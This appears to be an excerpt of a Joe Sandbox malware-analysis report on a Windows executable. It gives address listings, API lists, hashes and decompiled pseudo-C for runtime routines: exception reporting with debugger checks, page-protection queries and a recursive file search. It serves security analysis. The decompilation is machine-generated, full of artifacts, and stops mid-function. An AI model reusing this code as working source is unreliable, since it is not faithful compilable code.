                0x003d3251
                0x003d32a6
                0x003d32ad
                0x003d32b4
                0x003d32b9
                0x003d32bd
                0x00000000
                0x00000000
                0x003d32c6
                0x003d32cb
                0x00000000
                0x003d32cb
                0x003d3253
                0x003d325a
                0x00000000
                0x00000000
                0x003d3263
                0x003d3271
                0x003d3271
                0x003d3274
                0x003d327b
                0x003d3283
                0x003d3286
                0x003d328a
                0x003d328c
                0x003d3293
                0x003d3297
                0x003d329a
                0x003d329d
                0x003d329d
                0x003d329d
                0x003d32a2
                0x003d32a4
                0x00000000
                0x00000000
                0x00000000
                0x003d32a4
                0x003d31e2
                0x003d31e4
                0x003d31eb
                0x00000000
                0x00000000
                0x00000000
                0x003d31eb
                0x003d2a42
                0x003d2a42
                0x003d2a45
                0x003d2b0a
                0x003d2b0c
                0x003d2b14
                0x003d2b23
                0x003d2b27
                0x003d2b2a
                0x003d2b31
                0x003d2b3a
                0x003d2b3c
                0x003d2b40
                0x003d2b46
                0x003d2b4b
                0x003d2b57
                0x003d2b64
                0x003d2b71
                0x003d2b79
                0x003d2b7c
                0x003d2b7f
                0x003d2b8c
                0x003d2b8c
                0x003d2b8c
                0x003d2b8e
                0x003d2b91
                0x003d2b94
                0x003d2b9a
                0x003d2b9d
                0x003d2ba0
                0x003d2ba8
                0x003d2ba8
                0x003d2baa
                0x003d2baa
                0x003d2bb5
                0x003d2bb7
                0x003d2bbc
                0x003d2bc2
                0x003d2bc8
                0x003d2bd1
                0x003d2be1
                0x003d2be1
                0x003d2bca
                0x003d2bca
                0x003d2bcc
                0x003d2bcc
                0x003d2be3
                0x003d2bf9
                0x003d2bff
                0x003d2c0d
                0x003d2c18
                0x003d2c23
                0x003d2c26
                0x003d2c38
                0x003d2c46
                0x003d2c51
                0x003d2c61
                0x003d2c6c
                0x003d2c72
                0x003d2c77
                0x003d2c7a
                0x003d2c7d
                0x003d2c80
                0x003d2c83
                0x003d2c85
                0x003d2c87
                0x003d2c89
                0x003d2c89
                0x003d2c87
                0x003d2c92
                0x003d2c98
                0x003d2c9e
                0x003d2ce3
                0x003d2ce3
                0x003d2ce6
                0x003d2cf0
                0x003d2cf2
                0x003d2d04
                0x003d2d04
                0x003d2d0e
                0x003d2d0e
                0x003d2d14
                0x003d2d16
                0x003d2d20
                0x003d2d25
                0x003d2d27
                0x003d2d29
                0x003d2d33
                0x003d2d33
                0x003d2d25
                0x003d2d3a
                0x003d2d3d
                0x003d2d46
                0x003d2d46
                0x00000000
                0x003d2d3f
                0x003d2d3f
                0x003d2d41
                0x003d2d44
                0x003d2d48
                0x003d2d48
                0x003d2d54
                0x003d2d54
                0x003d2d56
                0x003d2d5c
                0x003d2d89
                0x003d2d8d
                0x003d2d8f
                0x003d2d91
                0x003d2d91
                0x003d2d91
                0x003d2d94
                0x003d2d94
                0x003d2d9a
                0x003d2da2
                0x003d2da8
                0x003d2daf
                0x003d2db5
                0x003d2db7
                0x003d2dbd
                0x003d2dc1
                0x003d2dc7
                0x003d2dce
                0x003d2dd4
                0x003d2dd4
                0x003d2dda
                0x003d2ddd
                0x003d2de2
                0x003d2de4
                0x003d2de6
                0x003d2de6
                0x003d2df3
                0x003d2dfa
                0x003d2dfc
                0x003d2e00
                0x003d2e17
                0x003d2e19
                0x003d2e1d
                0x003d2e20
                0x003d2ea4
                0x003d2eac
                0x003d2eaf
                0x003d2eb6
                0x003d2eb9
                0x003d2ebb
                0x003d2ebb
                0x003d2ebe
                0x003d2ec0
                0x003d2ecd
                0x003d2ed3
                0x003d2eeb
                0x003d2ef2
                0x003d2ef4
                0x003d2efa
                0x003d2f01
                0x003d2f07
                0x003d2f09
                0x003d2f0d
                0x003d2f0e
                0x003d2f12
                0x003d2f1a
                0x003d2f1e
                0x003d2f20
                0x003d2f24
                0x003d2f26
                0x003d2f2e
                0x003d2f30
                0x003d2f34
                0x003d2f36
                0x003d2f3e
                0x003d2f42
                0x003d2f4b
                0x003d2f56
                0x003d2f5c
                0x003d2f78
                0x003d2f88
                0x003d2f8e
                0x003d2f91
                0x003d2f9c
                0x003d2fa4
                0x003d2fa9
                0x003d2fac
                0x003d2faf
                0x003d2fb1
                0x003d2fb3
                0x003d2fb6
                0x003d2fb6
                0x003d2fb1
                0x003d2f01
                0x003d2ef4
                0x003d2fc4
                0x003d2fcb
                0x003d2fcd
                0x003d2fcf
                0x003d2fcf
                0x003d2e22
                0x003d2e22
                0x003d2e24
                0x003d2e27
                0x003d2e2e
                0x003d2e33
                0x003d2e44
                0x003d2e46
                0x003d2e48
                0x003d2e5d
                0x003d2e67
                0x003d2e67
                0x003d2e6c
                0x003d2e6f
                0x003d2e6f
                0x003d2e6f
                0x003d2e71
                0x003d2e74
                0x003d2e76
                0x003d2e78
                0x003d2e7d
                0x003d2e84
                0x003d2e85
                0x003d2e85
                0x003d2e8d
                0x003d2e8d
                0x003d2fd6
                0x003d2fdd
                0x003d2feb
                0x003d2feb
                0x003d2ff9
                0x003d2ffe
                0x003d3005
                0x003d30dd
                0x003d30fe
                0x003d3107
                0x003d3113
                0x003d3119
                0x003d3121
                0x003d3123
                0x003d3130
                0x003d3137
                0x003d313c
                0x003d3140
                0x003d314f
                0x003d314f
                0x003d3140
                0x00000000
                0x003d300b
                0x003d300e
                0x003d301c
                0x003d3025
                0x003d302e
                0x003d3031
                0x003d3033
                0x003d3035
                0x003d3038
                0x003d303a
                0x003d303d
                0x003d3040
                0x003d3042
                0x003d304a
                0x003d304c
                0x003d304f
                0x00000000
                0x00000000
                0x003d3051
                0x003d3056
                0x00000000
                0x00000000
                0x003d3058
                0x003d305a
                0x003d3069
                0x003d3069
                0x003d3076
                0x003d307b
                0x003d307e
                0x003d3080
                0x003d3080
                0x003d3080
                0x003d3080
                0x003d3083
                0x003d3085
                0x003d3088
                0x003d3088
                0x003d308b
                0x003d30b7
                0x003d30b7
                0x003d30b7
                0x003d30be
                0x003d30c5
                0x003d30ca
                0x003d308d
                0x003d308f
                0x003d3092
                0x003d3092
                0x003d3095
                0x003d30a2
                0x003d30a4
                0x003d30aa
                0x003d30ac
                0x003d30af
                0x003d30af
                0x003d30af
                0x003d30b4
                0x00000000
                0x003d30b4
                0x003d30cd
                0x003d30cd
                0x003d30ce
                0x003d30d1
                0x003d30d1
                0x003d30da
                0x00000000
                0x003d30da
                0x003d3005
                0x003d2d69
                0x003d2d6b
                0x003d2d70
                0x003d2d74
                0x003d2d76
                0x003d2d83
                0x003d2d85
                0x00000000
                0x003d2d85
                0x003d2d78
                0x003d2d7b
                0x00000000
                0x00000000
                0x003d2d7d
                0x00000000
                0x003d2d7f
                0x00000000
                0x003d2d44
                0x003d2d3d
                0x003d2cf4
                0x003d2cf6
                0x00000000
                0x00000000
                0x003d2cf8
                0x003d2cfa
                0x003d2cfc
                0x003d2cfc
                0x00000000
                0x003d2ca0
                0x003d2ca0
                0x003d2ca0
                0x003d2ca3
                0x003d2cd9
                0x00000000
                0x003d2cd9
                0x003d2ca6
                0x003d2ca6
                0x003d2ca9
                0x003d2ccd
                0x00000000
                0x003d2ccd
                0x003d2cab
                0x003d2cab
                0x003d2cae
                0x003d2cc1
                0x003d2cc1
                0x00000000
                0x003d2cc1
                0x003d2cb0
                0x003d2cb3
                0x00000000
                0x00000000
                0x003d2cb5
                0x00000000
                0x003d2cb5
                0x003d2c9e
                0x003d2ba2
                0x003d2ba4
                0x003d2ba6
                0x00000000
                0x00000000
                0x00000000
                0x003d2ba6
                0x003d2b81
                0x003d2b83
                0x00000000
                0x00000000
                0x003d2b85
                0x003d2b88
                0x00000000
                0x003d2b88
                0x003d2a4b
                0x003d2a4b
                0x003d2a4e
                0x00000000
                0x00000000
                0x003d2a55
                0x003d2a58
                0x003d2a8c
                0x003d2a93
                0x003d2a9b
                0x003d2aa3
                0x003d2ab2
                0x003d2aba
                0x003d2abd
                0x003d2ac3
                0x003d2ac9
                0x003d2acf
                0x003d2ad1
                0x003d2adb
                0x003d2adb
                0x003d2ae1
                0x003d2ae8
                0x003d2af6
                0x003d2af9
                0x003d2aff
                0x003d2aff
                0x00000000
                0x003d2a5a
                0x003d2a5a
                0x003d2a64
                0x003d2a72
                0x003d2a78
                0x003d2a78
                0x00000000
                0x003d2a64
                0x003d2a58
                0x003d29e7
                0x003d29ea
                0x003d29fa
                0x003d29fa
                0x00000000
                0x003d29fa
                0x003d29ec
                0x003d29f3
                0x00000000
                0x00000000
                0x00000000
                0x003d29f3
                0x003d29a5
                0x003d29a5
                0x003d29a8
                0x003d29c5
                0x003d29cb
                0x00000000
                0x003d29cb
                0x003d29aa
                0x003d29aa
                0x003d29ad
                0x003d29b8
                0x003d29ba
                0x003d29ba
                0x003d29bb
                0x003d29c1
                0x00000000
                0x003d29c1
                0x003d29af
                0x003d29b2
                0x00000000
                0x003d29b4
                0x003d29b4
                0x00000000
                0x003d29b4
                0x003d298f
                0x003d2991
                0x00000000
                0x003d2991
                0x003d298d
                0x003d28af
                0x003d28b1
                0x003d28b3
                0x003d28b9
                0x00000000
                0x003d28c5
                0x003d28c7
                0x003d28cb
                0x003d28dd
                0x003d28ea
                0x003d2908
                0x003d2919
                0x003d291e
                0x00000000
                0x003d291e
                0x00000000
                0x003d28ea

                APIs
                • __EH_prolog.LIBCMT ref: 003D2874
                • _strlen.LIBCMT ref: 003D2E3F
                  • Part of subcall function 003E02BA: __EH_prolog.LIBCMT ref: 003E02BF
                  • Part of subcall function 003E1B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,003DBAE9,00000000,?,?,?,000303F2), ref: 003E1BA0
                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 003D2F91
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: H_prolog$ByteCharMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
                • String ID: CMT
                • API String ID: 1206968400-2756464174
                • Opcode ID: 878f7bbbb0f668aec3cd17ec035d1314d5e4c6f8dbd2b79811fd4e5779754715
                • Instruction ID: ae991a108ce2f9c0860181fc95f10c401957663cfe3cf50cde84f5d55e0e8084
                • Opcode Fuzzy Hash: 878f7bbbb0f668aec3cd17ec035d1314d5e4c6f8dbd2b79811fd4e5779754715
                • Instruction Fuzzy Hash: F56235729102458FDB1ADF34D8866EA3BA1EF64300F09457FEC9A8F382DB759945CB60
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003EF838 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                Download Yara Rule
                C-Code - Quality: 85%
                			E003EF838(intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4) {
				char _v0;
				struct _EXCEPTION_POINTERS _v12;
				intOrPtr _v80;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v608;
				intOrPtr _v612;
				void* _v616;
				intOrPtr _v620;
				char _v624;
				intOrPtr _v628;
				intOrPtr _v632;
				intOrPtr _v636;
				intOrPtr _v640;
				intOrPtr _v644;
				intOrPtr _v648;
				intOrPtr _v652;
				intOrPtr _v656;
				intOrPtr _v660;
				intOrPtr _v664;
				intOrPtr _v668;
				char _v808;
				char* _t39;
				long _t49;
				intOrPtr _t51;
				void* _t54;
				intOrPtr _t55;
				intOrPtr _t57;
				intOrPtr _t58;
				intOrPtr _t59;
				intOrPtr* _t60;

				_t59 = __esi;
				_t58 = __edi;
				_t57 = __edx;
				if(IsProcessorFeaturePresent(0x17) != 0) {
					_t55 = _a4;
					asm("int 0x29");
				}
				E003EFA46(_t34);
				 *_t60 = 0x2cc;
				_v632 = E003EFFF0(_t58,  &_v808, 0, 3);
				_v636 = _t55;
				_v640 = _t57;
				_v644 = _t51;
				_v648 = _t59;
				_v652 = _t58;
				_v608 = ss;
				_v620 = cs;
				_v656 = ds;
				_v660 = es;
				_v664 = fs;
				_v668 = gs;
				asm("pushfd");
				_pop( *_t15);
				_v624 = _v0;
				_t39 =  &_v0;
				_v612 = _t39;
				_v808 = 0x10001;
				_v628 =  *((intOrPtr*)(_t39 - 4));
				E003EFFF0(_t58,  &_v92, 0, 0x50);
				_v92 = 0x40000015;
				_v88 = 1;
				_v80 = _v0;
				_t28 = IsDebuggerPresent() - 1; // -1
				_v12.ExceptionRecord =  &_v92;
				asm("sbb bl, bl");
				_v12.ContextRecord =  &_v808;
				_t54 =  ~_t28 + 1;
				SetUnhandledExceptionFilter(0);
				_t49 = UnhandledExceptionFilter( &_v12);
				if(_t49 == 0 && _t54 == 0) {
					_push(3);
					return E003EFA46(_t49);
				}
				return _t49;
			}


































                0x003ef838
                0x003ef838
                0x003ef838
                0x003ef84c
                0x003ef84e
                0x003ef851
                0x003ef851
                0x003ef855
                0x003ef85a
                0x003ef872
                0x003ef878
                0x003ef87e
                0x003ef884
                0x003ef88a
                0x003ef890
                0x003ef896
                0x003ef89d
                0x003ef8a4
                0x003ef8ab
                0x003ef8b2
                0x003ef8b9
                0x003ef8c0
                0x003ef8c1
                0x003ef8ca
                0x003ef8d0
                0x003ef8d3
                0x003ef8d9
                0x003ef8e8
                0x003ef8f4
                0x003ef8ff
                0x003ef906
                0x003ef90d
                0x003ef918
                0x003ef920
                0x003ef929
                0x003ef92b
                0x003ef92e
                0x003ef930
                0x003ef93a
                0x003ef942
                0x003ef948
                0x00000000
                0x003ef94f
                0x003ef952

                APIs
                • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 003EF844
                • IsDebuggerPresent.KERNEL32 ref: 003EF910
                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 003EF930
                • UnhandledExceptionFilter.KERNEL32(?), ref: 003EF93A
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                • String ID:
                • API String ID: 254469556-0
                • Opcode ID: d0d9feb44271a4441b805d5f32e819196810685e09d0032377453faff594cc56
                • Instruction ID: 686db9c6fe7c919a7cb41c90c2d8c7964d7d54687376b5ec1c7a23a322d6e649
                • Opcode Fuzzy Hash: d0d9feb44271a4441b805d5f32e819196810685e09d0032377453faff594cc56
                • Instruction Fuzzy Hash: 36312B75D152299FDF11DFA5D9897CCBBB8AF08704F1041AAE40CAB290EBB19B858F44
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003EE6A3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 83%
                			E003EE6A3(signed int _a4, signed int _a8) {
				struct _MEMORY_BASIC_INFORMATION _v32;
				struct _SYSTEM_INFO _v68;
				long _t20;
				signed int _t28;
				void* _t30;
				signed int _t32;
				signed int _t40;
				signed int _t45;

				_t20 = VirtualQuery(_a4,  &_v32, 0x1c);
				if(_t20 == 0) {
					_push(0x19);
					asm("int 0x29");
				}
				if((_v32.Protect & 0x00000044) != 0) {
					GetSystemInfo( &_v68);
					_t40 = _v68.dwPageSize;
					_t32 = _t40 - 1;
					_t45 =  !_t32 & _a4;
					_t28 = _a8 / _t40;
					_t30 = ((_t32 & _a4) + _t40 + (_t32 & _a8) - 1) / _t40 + _t28;
					if(_t30 == 0) {
						L5:
						return _t28;
					} else {
						goto L4;
					}
					do {
						L4:
						_t28 = 0;
						asm("lock or [esi], eax");
						_t45 = _t45 + _t40;
						_t30 = _t30 - 1;
					} while (_t30 != 0);
					goto L5;
				}
				return _t20;
			}











                0x003ee6b4
                0x003ee6bc
                0x003ee6be
                0x003ee6c1
                0x003ee6c1
                0x003ee6c7
                0x003ee6cf
                0x003ee6d5
                0x003ee6d8
                0x003ee6ea
                0x003ee6fa
                0x003ee6fc
                0x003ee6fe
                0x003ee70c
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x003ee700
                0x003ee700
                0x003ee700
                0x003ee702
                0x003ee705
                0x003ee707
                0x003ee707
                0x00000000
                0x003ee700
                0x003ee70f

                APIs
                • VirtualQuery.KERNEL32(80000000,003EE5E8,0000001C,003EE7DD,00000000,?,?,?,?,?,?,?,003EE5E8,00000004,00431CEC,003EE86D), ref: 003EE6B4
                • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,003EE5E8,00000004,00431CEC,003EE86D), ref: 003EE6CF
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: InfoQuerySystemVirtual
                • String ID: D
                • API String ID: 401686933-2746444292
                • Opcode ID: 5d3cf2dd4eb99df9d341d338f3d7b1d34fb790029dfebfe0d6b56ec171dbd5f5
                • Instruction ID: e27f3abd2c003f0d0ed31d55efbe88dbb967f68a5a8b19c171cf8b80a148d990
                • Opcode Fuzzy Hash: 5d3cf2dd4eb99df9d341d338f3d7b1d34fb790029dfebfe0d6b56ec171dbd5f5
                • Instruction Fuzzy Hash: 28012B326001596BDF14DE29DC09BDE7BAEEFC4325F0DC220ED19DB194D634D9058680
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003F8EBD Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 79%
                			E003F8EBD(intOrPtr __ebx, intOrPtr __edx, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v0;
				signed int _v8;
				intOrPtr _v524;
				intOrPtr _v528;
				void* _v532;
				intOrPtr _v536;
				char _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				char _v724;
				intOrPtr _v792;
				intOrPtr _v800;
				char _v804;
				intOrPtr _v808;
				char _v812;
				void* __edi;
				signed int _t40;
				char* _t47;
				intOrPtr _t49;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t65;
				intOrPtr _t66;
				int _t67;
				intOrPtr _t68;
				signed int _t69;

				_t68 = __esi;
				_t65 = __edx;
				_t60 = __ebx;
				_t40 =  *0x40e7ac; // 0xc24f6281
				_t41 = _t40 ^ _t69;
				_v8 = _t40 ^ _t69;
				if(_a4 != 0xffffffff) {
					_push(_a4);
					E003EFA46(_t41);
					_pop(_t61);
				}
				E003EFFF0(_t66,  &_v804, 0, 0x50);
				E003EFFF0(_t66,  &_v724, 0, 0x2cc);
				_v812 =  &_v804;
				_t47 =  &_v724;
				_v808 = _t47;
				_v548 = _t47;
				_v552 = _t61;
				_v556 = _t65;
				_v560 = _t60;
				_v564 = _t68;
				_v568 = _t66;
				_v524 = ss;
				_v536 = cs;
				_v572 = ds;
				_v576 = es;
				_v580 = fs;
				_v584 = gs;
				asm("pushfd");
				_pop( *_t22);
				_v540 = _v0;
				_t25 =  &_v0; // 0x7
				_t49 = _t25;
				_v528 = _t49;
				_v724 = 0x10001;
				_v544 =  *((intOrPtr*)(_t49 - 4));
				_v804 = _a8;
				_v800 = _a12;
				_v792 = _v0;
				_t67 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(0);
				_t36 =  &_v812; // -805
				if(UnhandledExceptionFilter(_t36) == 0 && _t67 == 0 && _a4 != 0xffffffff) {
					_push(_a4);
					_t57 = E003EFA46(_t57);
				}
				return E003EFBBC(_t57, _t60, _v8 ^ _t69, _t65, _t67, _t68);
			}






































                0x003f8ebd
                0x003f8ebd
                0x003f8ebd
                0x003f8ec8
                0x003f8ecd
                0x003f8ecf
                0x003f8ed7
                0x003f8ed9
                0x003f8edc
                0x003f8ee1
                0x003f8ee1
                0x003f8eed
                0x003f8f00
                0x003f8f0e
                0x003f8f14
                0x003f8f1a
                0x003f8f20
                0x003f8f26
                0x003f8f2c
                0x003f8f32
                0x003f8f38
                0x003f8f3e
                0x003f8f44
                0x003f8f4b
                0x003f8f52
                0x003f8f59
                0x003f8f60
                0x003f8f67
                0x003f8f6e
                0x003f8f6f
                0x003f8f78
                0x003f8f7e
                0x003f8f7e
                0x003f8f81
                0x003f8f87
                0x003f8f94
                0x003f8f9d
                0x003f8fa6
                0x003f8faf
                0x003f8fbd
                0x003f8fbf
                0x003f8fc5
                0x003f8fd4
                0x003f8fe0
                0x003f8fe3
                0x003f8fe8
                0x003f8ff7

                APIs
                • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 003F8FB5
                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 003F8FBF
                • UnhandledExceptionFilter.KERNEL32(-00000325,?,?,?,?,?,00000000), ref: 003F8FCC
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                • String ID:
                • API String ID: 3906539128-0
                • Opcode ID: 2436f1df35d1efc802aa8f8f3a09d04622294db6b2de0ffe05060e8ffed41e0b
                • Instruction ID: d02378278beff916dfda85715e755bea018440d09ce2dfc13d372d5ad1fd08f7
                • Opcode Fuzzy Hash: 2436f1df35d1efc802aa8f8f3a09d04622294db6b2de0ffe05060e8ffed41e0b
                • Instruction Fuzzy Hash: 7A31D87591122C9BCB21DF25DD8879CBBB8AF08310F5042EAE41CAB290EB749F818F44
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003FB348 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
                Download Yara Rule
                C-Code - Quality: 71%
                			E003FB348(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				signed int _v12;
				intOrPtr* _v32;
				CHAR* _v36;
				signed int _v48;
				char _v286;
				signed int _v287;
				struct _WIN32_FIND_DATAA _v332;
				intOrPtr* _v336;
				signed int _v340;
				signed int _v344;
				intOrPtr _v372;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				signed int _t40;
				signed int _t43;
				intOrPtr _t45;
				signed char _t47;
				intOrPtr* _t55;
				union _FINDEX_INFO_LEVELS _t57;
				union _FINDEX_INFO_LEVELS _t58;
				signed int _t62;
				signed int _t65;
				void* _t71;
				void* _t73;
				signed int _t74;
				void* _t77;
				CHAR* _t78;
				void* _t79;
				intOrPtr* _t82;
				intOrPtr _t84;
				void* _t86;
				intOrPtr* _t87;
				signed int _t91;
				signed int _t95;
				void* _t100;
				signed int _t103;
				union _FINDEX_INFO_LEVELS _t104;
				void* _t105;
				void* _t108;
				void* _t109;
				intOrPtr _t110;
				void* _t111;
				void* _t112;
				signed int _t116;
				void* _t117;
				signed int _t118;
				void* _t119;
				void* _t120;

				_push(__ecx);
				_t82 = _a4;
				_t2 = _t82 + 1; // 0x1
				_t100 = _t2;
				do {
					_t35 =  *_t82;
					_t82 = _t82 + 1;
				} while (_t35 != 0);
				_t103 = _a12;
				_t84 = _t82 - _t100 + 1;
				_v8 = _t84;
				if(_t84 <= (_t35 | 0xffffffff) - _t103) {
					_t5 = _t103 + 1; // 0x1
					_t77 = _t5 + _t84;
					_t109 = E003FB136(_t84, _t77, 1);
					_t86 = _t108;
					__eflags = _t103;
					if(_t103 == 0) {
						L6:
						_push(_v8);
						_t77 = _t77 - _t103;
						_t40 = E003FF101(_t86, _t109 + _t103, _t77, _a4);
						_t118 = _t117 + 0x10;
						__eflags = _t40;
						if(__eflags != 0) {
							goto L9;
						} else {
							_t71 = E003FB587(_a16, _t100, __eflags, _t109);
							E003F8DCC(0);
							_t73 = _t71;
							goto L8;
						}
					} else {
						_push(_t103);
						_t74 = E003FF101(_t86, _t109, _t77, _a8);
						_t118 = _t117 + 0x10;
						__eflags = _t74;
						if(_t74 != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							E003F9097();
							asm("int3");
							_t116 = _t118;
							_t119 = _t118 - 0x150;
							_t43 =  *0x40e7ac; // 0xc24f6281
							_v48 = _t43 ^ _t116;
							_t87 = _v32;
							_push(_t77);
							_t78 = _v36;
							_push(_t109);
							_t110 = _v332.cAlternateFileName;
							_push(_t103);
							_v372 = _t110;
							while(1) {
								__eflags = _t87 - _t78;
								if(_t87 == _t78) {
									break;
								}
								_t45 =  *_t87;
								__eflags = _t45 - 0x2f;
								if(_t45 != 0x2f) {
									__eflags = _t45 - 0x5c;
									if(_t45 != 0x5c) {
										__eflags = _t45 - 0x3a;
										if(_t45 != 0x3a) {
											_t87 = E003FF150(_t78, _t87);
											continue;
										}
									}
								}
								break;
							}
							_t101 =  *_t87;
							__eflags = _t101 - 0x3a;
							if(_t101 != 0x3a) {
								L19:
								_t104 = 0;
								__eflags = _t101 - 0x2f;
								if(_t101 == 0x2f) {
									L23:
									_t47 = 1;
									__eflags = 1;
								} else {
									__eflags = _t101 - 0x5c;
									if(_t101 == 0x5c) {
										goto L23;
									} else {
										__eflags = _t101 - 0x3a;
										if(_t101 == 0x3a) {
											goto L23;
										} else {
											_t47 = 0;
										}
									}
								}
								_t89 = _t87 - _t78 + 1;
								asm("sbb eax, eax");
								_v340 =  ~(_t47 & 0x000000ff) & _t87 - _t78 + 0x00000001;
								E003EFFF0(_t104,  &_v332, _t104, 0x140);
								_t120 = _t119 + 0xc;
								_t111 = FindFirstFileExA(_t78, _t104,  &_v332, _t104, _t104, _t104);
								_t55 = _v336;
								__eflags = _t111 - 0xffffffff;
								if(_t111 != 0xffffffff) {
									_t91 =  *((intOrPtr*)(_t55 + 4)) -  *_t55;
									__eflags = _t91;
									_t92 = _t91 >> 2;
									_v344 = _t91 >> 2;
									do {
										__eflags = _v332.cFileName - 0x2e;
										if(_v332.cFileName != 0x2e) {
											L36:
											_push(_t55);
											_t57 = E003FB348(_t92,  &(_v332.cFileName), _t78, _v340);
											_t120 = _t120 + 0x10;
											__eflags = _t57;
											if(_t57 != 0) {
												goto L26;
											} else {
												goto L37;
											}
										} else {
											_t92 = _v287;
											__eflags = _t92;
											if(_t92 == 0) {
												goto L37;
											} else {
												__eflags = _t92 - 0x2e;
												if(_t92 != 0x2e) {
													goto L36;
												} else {
													__eflags = _v286;
													if(_v286 == 0) {
														goto L37;
													} else {
														goto L36;
													}
												}
											}
										}
										goto L40;
										L37:
										_t62 = FindNextFileA(_t111,  &_v332);
										__eflags = _t62;
										_t55 = _v336;
									} while (_t62 != 0);
									_t101 =  *_t55;
									_t95 = _v344;
									_t65 =  *((intOrPtr*)(_t55 + 4)) -  *_t55 >> 2;
									__eflags = _t95 - _t65;
									if(_t95 != _t65) {
										E003F6310(_t78, _t101 + _t95 * 4, _t65 - _t95, 4, E003FB1A0);
									}
								} else {
									_push(_t55);
									_t57 = E003FB348(_t89, _t78, _t104, _t104);
									L26:
